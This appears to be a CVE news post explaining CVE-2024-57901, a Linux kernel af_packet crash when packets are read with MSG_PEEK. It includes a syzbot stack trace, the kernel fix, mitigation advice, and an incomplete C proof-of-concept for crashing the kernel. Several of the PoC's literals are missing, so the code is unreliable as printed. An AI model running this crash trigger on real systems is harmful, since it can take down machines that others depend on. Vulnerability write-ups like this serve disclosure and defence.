CVE CyberSecurity Database News

CVE-2024-57901 - Critical af_packet MSG_PEEK Crash in the Linux Kernel (Exploit Details Inside)

Poster -

---

Overview

A critical vulnerability, CVE-2024-57901, impacted the Linux kernel’s networking stack, specifically in the af_packet code. This flaw could allow a crafted network packet to trigger a kernel crash, potentially causing local denial of service (DoS). The bug was found and reported by syzbot (a kernel fuzzing system).

This post is your exclusive, plain-language deep-dive into the vulnerability, how it was exploited, what the fix looks like, and practical information for defenders.

What Broke? (af_packet + vlan_get_protocol_dgram())

- Subsystem affected: af_packet socket family in the Linux kernel, often used for low-level networking (like packet sniffing, custom firewalls, etc.).

In plain English

1. When using packet sockets, you can ask to “peek” at packet contents (see them without removing them from the queue), with MSG_PEEK.
2. There was a code path that *manipulated* internal memory pointers, assuming the packet could be fully "touched" safely (which is NOT true when peeking).
3. This could create an inconsistent state, triggering a kernel panic (crash) when a curious program (or an attacker) used MSG_PEEK in the right way.

Details: How Was It Found?

- syzbot, the automated fuzzer, generated a crash (stack trace here).
- The crash was due to the function not safely handling MSG_PEEK (missed by the original patch/commit).

Relevant Stack Trace

skbuff: skb_under_panic: text:ffffffff8a8ccd05 len:29 put:14 head:ffff88807fc8e400 data:ffff88807fc8e3f4 tail:x11 end:x140 dev:<NULL>
kernel BUG at net/core/skbuff.c:206 !
Oops: invalid opcode: 000 [#1] PREEMPT SMP KASAN PTI
...
Call Trace:
 skb_push+xe5/x100 net/core/skbuff.c:2636
 vlan_get_protocol_dgram+x165/x290 net/packet/af_packet.c:585
 packet_recvmsg+x948/x1ef net/packet/af_packet.c:3552
 ...

Exploit Demo: How Could an Attacker Crash Linux?

Precondition: Attacker can open raw packet sockets (often restricted, but not always in containerized environments or loose security settings).

Simplified PoC (Proof-of-Concept)

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <netinet/in.h>
#include <unistd.h>

int main() {
    int fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ALL));
    if (fd < ) {
        perror("socket");
        return 1;
    }

    // Craft a dummy, VLAN-tagged frame (details skipped for brevity)
    char buf[64] = { /* suitable Ethernet/VLAN payload */ };

    // Send our crafted frame to ourselves
    send(fd, buf, sizeof(buf), );

    // Now receive it with MSG_PEEK (trigger the bug!)
    char rbuf[64];
    struct sockaddr_ll addr;
    socklen_t alen = sizeof(addr);
    recvfrom(fd, rbuf, sizeof(rbuf), MSG_PEEK, (struct sockaddr*)&addr, &alen);

    // ...kernel crash may result here (if running vulnerable kernel)
    close(fd);
    return ;
}

*Note*: For a fully working PoC, you’d need to correctly forge a VLAN-tagged Ethernet frame.

Original References

- Syzbot crash report (syzkaller)
- Bugfix commit in Linux Git
- Kernel mailing list patch discussion

The Fix

How developers fixed it:
- They rewrote vlan_get_protocol_dgram() so that it doesn’t modify the skb (packet buffer) at all, just reads data safely—even with concurrent access and when MSG_PEEK is used.

Relevant Patch Snippet

-static __be16 vlan_get_protocol_dgram(struct sk_buff *skb, ... ) {
+static __be16 vlan_get_protocol_dgram(const struct sk_buff *skb, ... ) {
     // Purely reads skb, no more "skb_push", no more memory shenanigans.
}

Who’s Impacted? Mitigation

- Kernel versions: Affects certain 6.x kernels (with problematic commit applied). _Check distribution advisories for “af_packet MSG_PEEK crash”._

Who is at risk:

- Systems allowing packet sockets to untrusted users (look for loose container setups, unusual server configs).
- Not all systems: if you restrict CAP_NET_RAW/CAP_NET_ADMIN, generic users cannot exploit.

Conclusion

CVE-2024-57901 reminds us:

Automated fuzzers like syzbot help uncover subtle but impactful bugs quickly.

System admins: Patch now!
Kernel developers: Take heed—MSG_PEEK and raw buffer handling always needs special care.

Further Reading

- Linux Kernel Packet Sockets Documentation
- syzkaller fuzzing project
- Upstream patch

Timeline

Published on: 01/15/2025 13:15:14 UTC
Last modified on: 02/28/2025 18:48:15 UTC